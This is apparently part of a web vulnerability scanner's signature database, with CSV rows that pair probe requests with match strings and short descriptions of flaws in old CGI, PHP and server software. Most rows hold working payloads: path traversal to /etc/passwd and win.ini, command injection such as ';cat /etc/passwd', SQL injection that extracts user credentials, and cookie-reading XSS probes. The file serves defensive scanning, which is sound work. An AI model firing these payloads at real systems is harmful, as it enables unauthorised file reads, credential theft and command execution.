"000607","","5","@CGIDIRShsx.cgi?show=../../../../../../../../../../../etc/passwd%00","GET","root:","","","","","This CGI contains a well known vuln that allows attackers to read any system file.","","" "000608","","5","@CGIDIRSsewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd","GET","root:","","","","","Default scripts can allow arbitrary access to the host.","","" "000609","CVE-2003-0756","5","@CGIDIRSsbcgi/sitebuilder.cgi","GET","200","","","","","SITEBUILDER v1.4 may allow retrieval of any file. With a valid username and password, request: /<CGIDIR>/sbcgi/sitebuilder.cgi?username=<user>&password=<password>&selectedpage=../../../../../../../../../../etc/passwd","","" "000610","","5","@CGIDIRSmrtg.cgi?cfg=../../../../../../../../etc/passwd","GET","root:","","","","","Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version.","","" "000611","","5","@CGIDIRSmrtg.cfg?cfg=../../../../../../../../etc/passwd","GET","root:","","","","","Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version.","","" "000612","","5","@CGIDIRSmain.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to read arbitrary files remotely.","","" "000613","CVE-2002-1581","5","@CGIDIRSmail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00","GET","root:","","","","","MailReader.com v2.3.31 web package allows remote users to retrieve any system file.","","" "000614","CVE-2002-0531","5","@CGIDIRSmail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00","GET","root:","","","","","EmuMail allows any file to be retrieved from the remote system.","","" "000615","","5","@CGIDIRSloadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini","GET","\[windows\]","","","","","This CGI allows attackers to read arbitrary files on the host.","","" "000616","","5","@CGIDIRSloadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the host.","","" "000617","CVE-2000-0208","5","@CGIDIRShtsearch?exclude=%60/etc/passwd%60","GET","root:","","","","","This CGI contains a well known vuln that allows attackers to read any system file.","","" "000618","","5","@CGIDIRSshop.cgi?page=../../../../../../../etc/passwd","GET","root:","","","","","Remote file read retrieval.","","" "000619","","5","@CGIDIRSsendtemp.pl?templ=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI contains a well known vuln that allows attackers to read any system file.","","" "000620","","5","@CGIDIRSsearch/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc","GET","resolv\.conf","","","","","It is possible to read files on the remote server, this CGI should be removed.","","" "000621","CVE-2001-0215","5","@CGIDIRSsearch.pl?form=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","The ROADS search.pl allows attackers to retrieve system files.","","" "000622","","5","@CGIDIRSsearch.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini","GET","\[fonts\]","","","","","This CGI contains a well known vuln that allows attackers to read any system file.","","" "000623","","5","@CGIDIRSsearch.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini","GET","\[windows\]","","","","","This CGI contains a well known vuln that allows attackers to read any system file.","","" "000624","","5","@CGIDIRSquickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id=","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the remote system.","","" "000625","","5","@CGIDIRSpublisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10","GET","root:","","","","","AHG's search.cgi allows any command to be executed. www.ahg.com.","","" "000626","","5","@CGIDIRSphp.cgi?/etc/passwd","GET","root:","","","","","This allows attackers to read arbitrary files on the system and perhaps execute commands.","","" "000627","","5","@CGIDIRSpals-cgi?palsAction=restart&documentName=/etc/passwd","GET","root:","","","","","This CGI allows remote users to read system files.","","" "000628","","5","@CGIDIRSopendir.php?/etc/passwd","GET","root:","","","","","This CGI allows attackers to read any file on the web server.","","" "000629","CVE-2002-0531","5","@CGIDIRSnph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00","GET","root:","","","","","EmuMail allows any file to be retrieved from the remote system.","","" "000630","CVE-2001-0231","5","@CGIDIRSnewsdesk.cgi?t=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to view arbitrary files on the server.","","" "000631","CVE-2000-0782","5","@CGIDIRSnetauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to view arbitrary files on the server.","","" "000632","CVE-2000-0912,http://www.packetstormsecurity.org/0009-exploits/multihtml.c","5","@CGIDIRSmultihtml.pl?multi=/etc/passwd%00html","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the host. May also allow a shell to be spawned.","","" "000633","CVE-1999-0039","5","@CGIDIRSwebdist.cgi?distloc=;cat%20/etc/passwd","GET","root:","","","","","This CGI allows attackers to read files remotely.","","" "000634","CVE-2001-0214","5","@CGIDIRSway-board/way-board.cgi?db=/etc/passwd%00","GET","root:","","","","","Allows attackers to read arbitrary files from the server.","","" "000635","CVE-2001-0214","5","@CGIDIRSway-board.cgi?db=/etc/passwd%00","GET","root:","","","","","Allows attackers to read arbitrary files from the server.","","" "000637","","5","@CGIDIRSviewsource?/etc/passwd","GET","root:","","","","","Allows attacker to retrieve arbitrary files. Remove from CGI directory.","","" "000638","","5","@CGIDIRSttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd","GET","root:","","","","","Tarantell TTAWeb Top CGI lets remote users read arbitrary files.","","" "000639","","5","@CGIDIRStraffic.cgi?cfg=../../../../../../../../etc/passwd","GET","root:","","","","","Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version.","","" "000640","","5","@CGIDIRStechnote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to read arbitrary files remotely.","","" "000641","CVE-2001-0420","5","@CGIDIRStalkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1","GET","root:","","","","","Talkback CGI displays arbitrary files","","" "000642","CVE-2001-0804","5","@CGIDIRSstory/story.pl?next=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","story.pl versions older than 1.4 allow any file to be read remotely.","","" "000643","CVE-2001-0804","5","@CGIDIRSstory.pl?next=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","story.pl versions older than 1.4 allow any file to be read remotely.","","" "000644","","5","@CGIDIRSstore/index.cgi?page=../../../../../../../../etc/passwd","GET","root:","","","","","CommerceSQL allows reading of arbitrary files. Default login/pass is username/password.","","" "000645","","5","@CGIDIRSstore.cgi?StartID=../../../../../../../../../../etc/passwd%00.html","GET","root:","","","","","This CGI allows attackers to read arbitrary files remotely.","","" "000646","","5","@CGIDIRSssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd","GET","root:","","","","","The server install allows reading of any system file by sending encoded '../' directives.","","" "000647","CVE-2000-0180","5","@CGIDIRSsojourn.cgi?cat=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","This CGI allows attackers to read arbitrary files.","","" "000648","","5","@CGIDIRSsimple/view_page?mv_arg=|cat%20/etc/passwd|","GET","root:","","","","","This CGI allows attackers to execute commands on the host as the HTTP daemon owner.","","" "000649","CVE-2000-0922","5","@CGIDIRSshopper.cgi?newpage=../../../../../../../../../../etc/passwd","GET","root:","","","","","Versions 1 and 2 of Byte's Interactive Web Shopper allow attackers to read files remotely. Uncomment the #$debug=1 variable.","","" "000650","CVE-2001-1458","5","/servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../etc/passwd%00","GET","root:","","","","","The Novell Groupwise WebAcc Servlet allows attackers to view arbitrary files on the server.","","" "000651","","5","/webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd","GET","root:","","","","","Webcalendar 0.9.41 and below allow remote users to read arbitrary files.","","" "000652","https://vulners.com/osvdb/OSVDB:15392","5","/logbook.pl?file=../../../../../../../bin/cat%20/etc/passwd%00|","GET","root:","","","","","Wordit Limited 2000 allows command execution.","","" "000653","","5","@CGIDIRSsawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1","GET","root:","","","","","Remote file retrieval.","","" "000654","OSVDB-59084","5","/page.cgi?../../../../../../../../../../etc/passwd","GET","root:","","","","","WWWeBBB Forum up to version 3.82beta allow arbitrary file retrieval.","","" "000655","OSVDB-56290","5","/edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd","GET","root:","","","","","EditTag allows arbitrary file retrieval.","","" "000656","CVE-2001-1408","5","/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1","GET","root:","","","","","Remote file retrieval.","","" "000659","CVE-2001-1209","5","@CGIDIRSzml.cgi?file=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","Ztreet Markup Language interpreter allows arbitrary files to be read remotely.","","" "000660","","5","@CGIDIRSYaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","This CGI lets users read any file with http daemon's permissions. Upgrade to latest version","","" "000661","CVE-1999-1063","5","@CGIDIRSwhois_raw.cgi?fqdn=%0Acat%20/etc/passwd","GET","root:","","","","","Allows attacker to view any file (and possibly execute commands). Upgrade to latest version","","" "000662","","5","@CGIDIRSwhois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd","GET","root:","","","","","The whois.cgi allows any command to be executed on the system.","","" "000663","","5","@CGIDIRSwhois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd","GET","root:","","","","","The whois.cgi allows any command to be executed on the system.","","" "000664","CVE-2001-0211","5","@CGIDIRSwebspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to read arbitrary files.","","" "000665","","5","@CGIDIRSwebplus?script=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to retrieve files remotely.","","" "000666","","5","@CGIDIRSwebmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00","GET","root:","","","","","EmuMail allows any file to be retrieved from the remote system.","","" "000667","CVE-2004-1782","8","/athenareg.php?pass=%20;cat%20/etc/passwd","GET","root:","","","","","Athena web registration remote command execution.","","" "000668","CVE-2000-1196","7","/PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd","GET","root:","","","","","This default Netscape file allows an attacker to read arbitrary files on the host.","","" "000669","","5","/search?NS-query-pat=../../../../../../../../../../etc/passwd","GET","root:","","","","","The iPlanet server allows arbitrary files to be retrieved through the search functionality. Install 4.1 SP10+ or 6.0 SP3+","","" "000670","","5","/search?NS-query-pat=..\..\..\..\..\..\..\..\..\..\boot.ini","GET","boot loader","","","","","The iPlanet server allows arbitrary files to be retrieved through the search functionality. Install 4.1 SP10+ or 6.0 SP3+","","" "000671","","7","/..\..\..\..\..\..\temp\temp.class","GET","200","","","","","Cisco ACS 2.6.x and 3.0.1 (build 40) allows authenticated remote users to retrieve any file from the system. Upgrade to the latest version.","","" "000672","","7","/../../../../../../../../../../etc/passwd","GET","root:","","","","","It is possible to read files on the server by adding ../ in front of file name.","","" "000673","","7","/.../.../.../.../.../.../.../.../.../boot.ini","GET","boot loader","","","","","Software allows files to be retrieved outside of the web root by using 'triple dot' notation. May be MiniPortal?","","" "000674","","7","/................../etc/passwd","GET","root:","","","","","The web server allows the password file to be retrieved.","","" "000675","","3","/%3f.jsp","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","JRun 3.0 and 3.1 on NT/2000 running IIS4 or IIS5 allow directory listing by requesting %3f.jsp at the end of a URL.","","" "000677","CVE-2000-0664","7","/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini","GET","\[windows\]","","","","","Attackers can read any file on the system. Upgrade to Analogx 1.07 or higher.","","" "000678","","7","/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd","GET","root:","","","","","Web server allows reading of files by sending encoded '../' requests. This server may be Boa (boa.org).","","" "000679","","3","/%00","GET","File Name","","","","","Appending /%00 to a request to the web server may reveal a directory listing.","","" "000680","","7","/ca//\\../\\../\\../\\../\\../\\../\\windows/\\win.ini","GET","\[windows\]","","","","","It is possible to read files on the server by adding through directory traversal by adding multiple /\\.. in front of file name.","","" "000681","","7","/ca/..\\..\\..\\..\\..\\..\\/\\etc/\\passwd","GET","root:","","","","","It is possible to read files on the server by adding through directory traversal by adding multiple /\\.. in front of file name.","","" "000682","","7","/ca/..\\..\\..\\..\\..\\..\\..\\..\\winnt/\\win.ini","GET","\[fonts\]","","","","","It is possible to read files on the server by adding through directory traversal by adding multiple /\\.. in front of file name.","","" "000683","CVE-2002-0308","9","/admentor/adminadmin.asp","GET","200","","","","","Version 2.11 of AdMentor is vulnerable to SQL injection during login, in the style of: ' or =","","" "000684","CVE-2006-6795","9","@NUKEMy_eGallery/public/displayCategory.php","GET","200","","","","","My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection. displayCategory.php calls imageFunctions.php without checking URL/location arguments.","","" "000685","","9","@CGIDIRSclassifieds/index.cgi","GET","200","","","","","My Classifieds pre 2.12 is vulnerable to SQL injection attacks.","","" "000686","CVE-2003-0025","9","/imp/mailbox.php3?actionID=6&server=x&imapuser=x';somesql+--&pass=x","GET","parse error","","","","","IMP 2.x allows SQL injection, and reveals system information.","","" "000687","CVE-2002-0216","9","/userinfo.php?uid=1;","GET","Query\sError:","","","","","Xoops portal gives detailed error messages including SQL syntax and may allow an exploit.","","" "000688","","9","/site/'%20UNION%20ALL%20SELECT%20FileToClob('/etc/passwd','server')::html,0%20FROM%20sysusers%20WHERE%20username=USER%20--/.html","GET","root:","","","","","IBM Informix Web DataBlade allows remote execution of SQL","","" "000689","","9","/site/'%20UNION%20ALL%20SELECT%20FileToClob('/etc/passwd','server')::html,0%20FROM%20sysusers%20WHERE%20username%20=%20USER%20--/.html","GET","root:","","","","","Web DataBlade 4.12/Informix is vulnerable to SQL injection.","","" "000690","","9","/postnuke/index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*","GET","<r0x>\(\.\+\?\)<r0x>","","","","","My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection.","","" "000691","","9","/postnuke/html/index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*","GET","<r0x>\(\.\+\?\)<r0x>","","","","","My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection.","","" "000692","","8","@CGIDIRSalibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,","GET","boot\.ini","","","","","This CGI allows attackers to execute arbitrary commands on the server.","","" "000693","","9","/phpwebsite/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month=","GET","DB Error: syntax error","","","","","phpWebSite 0.9.x and below are vulnerable to SQL injection.","","" "000694","CVE-2003-1216","9","/phpBB2/search.php?search_id=1\\","GET","SQL Error","","","","","phpBB 2.06 search.php is vulnerable to SQL injection attack. Error page also includes full path to search.php file.","","" "000695","","9","/index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*","GET","<r0x>\(\.\+\?\)<r0x>","","","","","My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection.","","" "000696","CVE-2002-1499","9","/author.asp","GET","200","","","","","May be FactoSystem CMS, which could include SQL injection problems that could not be tested remotely.","","" "000697","CVE-2004-0584","4","/horde/test.php","GET","IMP: 3\.\(0\|1\|2\|2\\\.1\)","","","","","IMP version 3.0, 3.1, 3.2, or 3.2.1 are vulnerable to Cross Site Scripting (XSS).","","" "000698","CVE-2004-0584","4","/imp/horde/test.php","GET","IMP: 3\.\(0\|1\|2\|2\\\.1\)","","","","","IMP version 3.0, 3.1, 3.2, or 3.2.1 are vulnerable to Cross Site Scripting (XSS).","","" "000699","CVE-2004-0584","4","@CGIDIRShorde/test.php","GET","IMP: 3\.\(0\|1\|2\|2\\\.1\)","","","","","IMP version 3.0, 3.1, 3.2, or 3.2.1 are vulnerable to Cross Site Scripting (XSS).","","" "000700","https://seclists.org/fulldisclosure/2003/Jun/494","4","/examples/cookie","GET","Cookie servlet","","","","","JEUS default servlet examples are vulnerable to Cross Site Scripting (XSS) when requesting non-existing JSP pages.","","" "000701","https://seclists.org/fulldisclosure/2003/Jun/494","4","/examples/session","GET","Session servlet","","","","","JEUS default servlet examples are vulnerable to Cross Site Scripting (XSS) when requesting non-existing JSP pages.","","" "000702","CVE-2003-1204","4","/themes/mambosimple.php?detection=detected&sitename=</title><script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS).","","" "000703","","4","/index.php?option=search&searchword=<script>alert(document.cookie);</script>","GET","<script>alert\(document\.cookie\);<\/script>","","","","","Mambo Site Server 4.0 build 10 is vulnerable to Cross Site Scripting (XSS).","","" "000704","CVE-2003-1204","4","/emailfriend/emailnews.php?id=\"<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS).","","" "000705","CVE-2003-1204","4","/emailfriend/emailfaq.php?id=\"<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS).","","" "000706","CVE-2003-1204","4","/emailfriend/emailarticle.php?id=\"<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS).","","" "000707","","4","/administrator/upload.php?newbanner=1&choice=\"<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS).","","" "000708","CVE-2003-1204","4","/administrator/popups/sectionswindow.php?type=web&link=\"<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS).","","" "000709","CVE-2003-1204","4","/administrator/gallery/view.php?path=\"<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS).","","" "000710","CVE-2003-1204","4","/administrator/gallery/uploadimage.php?directory=\"<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS).","","" "000711","CVE-2003-1204","4","/administrator/gallery/navigation.php?directory=\"<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS).","","" "000712","CVE-2003-1204","4","/administrator/gallery/gallery.php?directory=\"<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS).","","" "000713","https://vulners.com/osvdb/OSVDB:2820","4","/index.php?dir=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Auto Directory Index 1.2.3 and prior are vulnerable to XSS attacks.","","" "000714","","4","/https-admserv/bin/index?/<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sun ONE Web Server 6.1 administration control is vulnerable to XSS attacks.","","" "000715","OSVDB-2876","4","/clusterframe.jsp?cluster=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Macromedia JRun 4.x JMC Interface, clusterframe.jsp file is vulnerable to a XSS attack.","","" "000716","","4","/article.cfm?id=1'<script>alert(document.cookie);</script>","GET","\[SQL SERVER\] Error Code","","","","","ColdFusion may reveal SQL information in malformed requests.","","" "000717","","4","/upload.php?type=\"<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS).","","" "000718","CVE-2002-1954","4","/soinfo.php?\"><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The PHP script soinfo.php is vulnerable to Cross Site Scripting. Set expose_php = Off in php.ini.","","" "000719","","4","/modules.php?op=modload&name=News&file=index&catid=&topic=><script>alert('Vulnerable');</script>;","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Postnuke is vulnerable to Cross Site Scripting.","","" "000720","","4","/modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Postnuke is vulnerable to Cross Site Scripting.","","" "000721","","4","/modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script+>","GET","<script>alert\('Vulnerable'\)<\/script\+>","","","","","Postnuke is vulnerable to Cross Site Scripting.","","" "000722","","4","/webtop/wdk/samples/dumpRequest.jsp?J=%3Cscript%3Ealert('Vulnerable');%3C/script%3Ef","GET","<script>alert\('Vulnerable'\);<\/script>","","","","","Documentum Webtop (Tomcat 4.1) is vulnerable to Cross Site Scripting (XSS).","","" "000723","OSVDB-59015","4","/addyoursite.php?catid=<Script>JavaScript:alert('Vulnerable');</Script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","phpLinkat is vulnerable to Cross Site Scripting (XSS).","","" "000724","","4","/666%0a%0a<script>alert('Vulnerable');</script>666.jsp","GET","<script>alert\('Vulnerable'\);<\/script>","","","","","Apache Tomcat 4.1 / Linux is vulnerable to Cross Site Scripting (XSS).","","" "000725","","4","/servlet/MsgPage?action=test&msg=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","NetDetector 3.0 and below are vulnerable to Cross Site Scripting (XSS).","","" "000726","","4","/servlet/org.apache.catalina.ContainerServlet/<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes.","","" "000727","","4","/servlet/org.apache.catalina.Context/<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes.","","" "000728","","4","/servlet/org.apache.catalina.Globals/<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes.","","" "000729","","4","/servlet/org.apache.catalina.servlets.WebdavStatus/<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes.","","" "000730","","4","/servlets/MsgPage?action=badlogin&msg=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The NetDetector install is vulnerable to Cross Site Scripting (XSS) in its invalid login message.","","" "000731","","4","/<script>alert('Vulnerable')</script>.shtm","GET","<script>alert\('Vulnerable'\)<\/script>\.shtml","","","","","Server is vulnerable to Cross Site Scripting (XSS).","","" "000732","","4","/<script>alert('Vulnerable')</script>.stm","GET","<script>alert\('Vulnerable'\)<\/script>\.shtml","","","","","Server is vulnerable to Cross Site Scripting (XSS).","","" "000733","","4","/admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de%20registro%20Web&URL=MasterSettings/Web_LogSettings.asp?tab1=TabsWebServer%26tab2=TabsWebLogSettings%26__SAPageKey=5742D5874845934A134CD05F39C63240&ReturnURL=\"><script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","IIS 6 on Windows 2003 is vulnerable to Cross Site Scripting (XSS) in certain error messages.","","" "000734","OSVDB-17665","4","/SiteServer/Knowledge/Default.asp?ctr=\"><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Site Server is vulnerable to Cross Site Scripting","","" "000735","OSVDB-17666","4","/_mem_bin/formslogin.asp?\"><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Site Server is vulnerable to Cross Site Scripting","","" "000736","https://seclists.org/fulldisclosure/2003/Jun/494","4","/nosuchurl/><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","JEUS is vulnerable to Cross Site Scripting (XSS) when requesting non-existing JSP pages.","","" "000737","CVE-2002-1455","4","/test.php?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x","GET","<SCRIPT>alert\('Vulnerable'\)<\/SCRIPT>","","","","","OmniHTTPD's test.php is vulnerable to Cross Site Scripting (XSS).","","" "000738","CVE-2002-1455","4","/test.shtml?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x","GET","<SCRIPT>alert\('Vulnerable'\)<\/SCRIPT>","","","","","OmniHTTPD's test.shtml is vulnerable to Cross Site Scripting (XSS).","","" "000739","CVE-2002-1455","4","@CGIDIRSredir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3C%2FSCRIPT%3E","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","OmniHTTPD's redir.exe is vulnerable to Cross Site Scripting (XSS).","","" "000740","","4","/search/results.stm?query=<script>alert('vulnerable');</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Default Sambar file is vulnerable to Cross Site Scripting (XSS).","","" "000741","OSVDB-3624","4","/webcalendar/week.php?eventinfo=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Webcalendar 0.9.42 and below are vulnerable to Cross Site Scripting (XSS).","","" "000742","CVE-2002-0955","4","@CGIDIRSYaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS).","","" "000743","","4","@CGIDIRSvq/demos/respond.pl?<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files.","","" "000744","CVE-2002-0771","4","@CGIDIRSviewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.","","" "000745","CVE-2002-0771","4","@CGIDIRSviewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.","","" "000746","CVE-2002-1008","4","@CGIDIRSurlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","urlcount.cgi on the Lil'HTTP server may be vulnerable to Cross Site Scripting (XSS).","","" "000747","","4","@CGIDIRStest-cgi.exe?<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Default CGI is vulnerable to Cross Site Scripting (XSS).","","" "000748","","4","@CGIDIRSstart.cgi/%3Cscript%3Ealert('Vulnerable');%3C/script%3E","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Aestiva HTML/OS is vulnerable to Cross Site Scripting (XSS).","","" "000749","CVE-2002-1036","4","@CGIDIRSsearch.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Fluid Dynamics FD Search engine is vulnerable to Cross Site Scripting (XSS). Upgrade to FDSE version 2.0.0.0055","","" "000750","CVE-2003-0614","4","@CGIDIRSsearch.php?searchstring=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. BID-8288.","","" "000751","CVE-2002-1009","4","@CGIDIRSpbcgi.cgi?name=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Lil'HTTP Server (Summit Computer Networks) CGI is vulnerable to Cross Site Scripting (XSS).","","" "000752","","4","@CGIDIRSmyguestbook.cgi?action=view","GET","200","","","","","myGuestBook 1.0 may be vulnerable to Cross Site Scripting (XSS) in posted contents. Upgrade to the latest version.","","" 